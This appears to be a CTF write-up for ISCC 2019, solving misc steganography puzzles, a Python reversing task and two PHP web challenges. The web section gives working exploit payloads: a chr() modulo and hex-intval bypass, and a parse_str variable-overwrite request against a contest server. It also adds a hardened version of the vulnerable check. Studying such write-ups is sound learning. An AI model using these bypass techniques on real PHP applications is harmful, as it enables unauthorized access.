iscc2019
misc
welcome
Add the .zip extension and open the file, then replace "蓅烺計劃 洮蓠朩暒" with 0 and "戶囗 萇條" with 1. This gives the binary string 011001100110110001100001011001110111101101001001010100110100001101000011010111110101011101000101010011000100001101001111010011010100010101111101
Convert it to ASCII
to get flag{ISCC_WELCOME}
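The most dangerous place is the safest place
Open the downloaded image in WinHex. A zip file is hidden inside it: search for 504B0304, copy the selected block into a new file and open it to find 50 images. Under Properties -> Details of the last image there is a base64 string ZmxhZ3sxNWNDOTAxMn0=
Decoding it gives flag{15cC9012}. There is one last twist: when submitting, submit only what is inside the braces.
The exe that won't run
Open it with Notepad++ to get a string.
Use http://www.tomeko.net/online_tools/base64.php?lang=en to convert the string into a dat file and open it in WinHex. The right-hand side of the header shows png, but the hex values on the left are wrong (they should be 89 50 4E 47 0D 0A 1A 0A). After fixing them, change the extension to png and open the file: it is a QR code, and scanning it gives the flag.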
Aesop’s secret
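After downloading and unzipping there is a gif image. Open it in Notepad and find this string at the end: U2FsdGVkX19QwGkcgD0fTjZxgijRzQOGbCWALh4sRDec2w6xsY/ux53Vuj/AMZBDJ87qyZL5kAf1fmAH4Oe13Iu435bfRBuZgHpnRjTBn5+xsDHONiR3t0+Oa8yG/tOKJMNUauedvMyN4v4QKiFunw==
It looks like AES encryption, and the guessed password is ISCC
Decrypting twice gives the flag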
https://zhuanlan.zhihu.com/p/30323085
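Can they be together?
The file is a QR code; scanning it gives UEFTUyU3QjBLX0lfTDBWM19ZMHUlMjElN0Q=
Base64-decode it and then URL-decode it to get PASS{0K_I_L0V3_Y0u!}
This does not match the flag format, so keep looking.
Open the QR code image in WinHex. At the very end there is the text you won’t wanner .txt, which suggests an embedded zip file. Search for the hex value 504b0304 (the zip file header) and carve out the selected block to get an encrypted archive. The password is what was obtained from scanning the QR code earlier. ISCC{S0rrY_W3_4R3_Ju5T_Fr1END}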
reverse
Simple python
Decompile it online
import base64

def encode(message):
    s = ''
    for i in message:
        x = ord(i) ^ 32
        x = x + 16
        s += chr(x)
    return base64.b64encode(s)

correct = 'eYNzc2tjWV1gXFWPYGlTbQ=='
flag = ''
print 'Input flag:'
flag = raw_input()
if encode(flag) == correct:
    print 'correct'
else:
    print 'wrong'
The logic is straightforward: run base64.b64decode on correct, subtract 16 from the ASCII value of each character, then XOR with 32 to get the flag.
exp
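# Python 3: inverts encode() from the decompiled challenge
import base64

correct = 'eYNzc2tjWV1gXFWPYGlTbQ=='
s = base64.b64decode(correct)
flag = ''
for b in s:
    # iterating over bytes yields ints; undo the +16, then undo the XOR with 32
    flag += chr((b - 16) ^ 32)
print(flag)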
web
web1
PHP code audit
<?php
error_reporting(0);
require 'flag.php';
$value = $_GET['value'];
$password = $_GET['password'];
$username = '';

for ($i = 0; $i < count($value); ++$i) {
    if ($value[$i] > 32 && $value[$i] < 127) unset($value);
    else $username .= chr($value[$i]);
    if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {
        echo 'Hello '.$username.'!', '<br>', PHP_EOL;
        echo $flag, '<hr>';
    }
}

highlight_file(__FILE__);
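A few tricks are needed
1. chr() takes its argument modulo 256, so adding 256 to each value bypasses the if check.
2. intval() mishandles hexadecimal input, but the implicit type conversion handles it normally.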
payload
value[0]=375&value[1]=307&value[2]=364&value[3]=355&value[4]=304&value[5]=365&value[6]=357&value[7]=351&value[8]=340&value[9]=367&value[10]=351&value[11]=329&value[12]=339&value[13]=323&value[14]=323&value[15]=306&value[16]=304&value[17]=305&value[18]=313&password=0x1233
web4
<?php
error_reporting(0);
include("flag.php");
$hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';
$parsed = parse_url($_SERVER['REQUEST_URI']);
if(isset($parsed["query"])){
    $query = $parsed["query"];
    $parsed_query = parse_str($query); // variables can be overwritten here
    if($parsed_query!=NULL){
        $action = $parsed_query['action'];
    }
    if($action==="auth"){
        $key = $_GET["key"];
        $hashed_input = hash('sha256', $key);
        if($hashed_input!==$hashed_key){
            die("<img src='cxk.jpg'>");
        }
        echo $flag;
    }
}else{
    show_source(__FILE__);
}?>
payload: 39.100.83.188:8066/?hashed_key=1eb79602411ef02cf6fe117897015fff89f80face4eccd50425c45149b148408&action=auth&key=this
Variable overwriting is used to replace the value of hashed_key with the sha256 hash of key.
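A hardened form of the web4 check, as an added example that is not part of the original challenge or write-up: the query is parsed into an array, so no request parameter can overwrite the stored hash. The function name is_authorized and the constant name HASHED_KEY are assumptions; the hash value and the sample request are the ones shown above.

```php
<?php
// Added example (not the challenge author's code). is_authorized() and
// HASHED_KEY are hypothetical names; the hash value is the one from web4.
const HASHED_KEY = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';

function is_authorized(string $requestUri): bool
{
    // parse_url() returns null when there is no query and false on a
    // malformed URI; both are rejected here.
    $query = parse_url($requestUri, PHP_URL_QUERY);
    if (!is_string($query)) {
        return false;
    }

    // Two-argument parse_str() writes into $params only, so nothing in the
    // query string can become a local variable such as $hashed_key.
    $params = [];
    parse_str($query, $params);

    $action = $params['action'] ?? null;
    $key    = $params['key'] ?? null;

    // Array-valued input (key[]=x) is rejected before it reaches hash().
    if ($action !== 'auth' || !is_string($key)) {
        return false;
    }

    // The reference hash is a constant and cannot be reassigned at runtime;
    // hash_equals() compares the two digests in constant time.
    return hash_equals(HASHED_KEY, hash('sha256', $key));
}

// The request from the write-up: hashed_key is now just an unused array
// entry, so the supplied key is checked against the real reference hash.
$uri = '/?hashed_key=1eb79602411ef02cf6fe117897015fff89f80face4eccd50425c45149b148408&action=auth&key=this';
var_dump(is_authorized($uri));
```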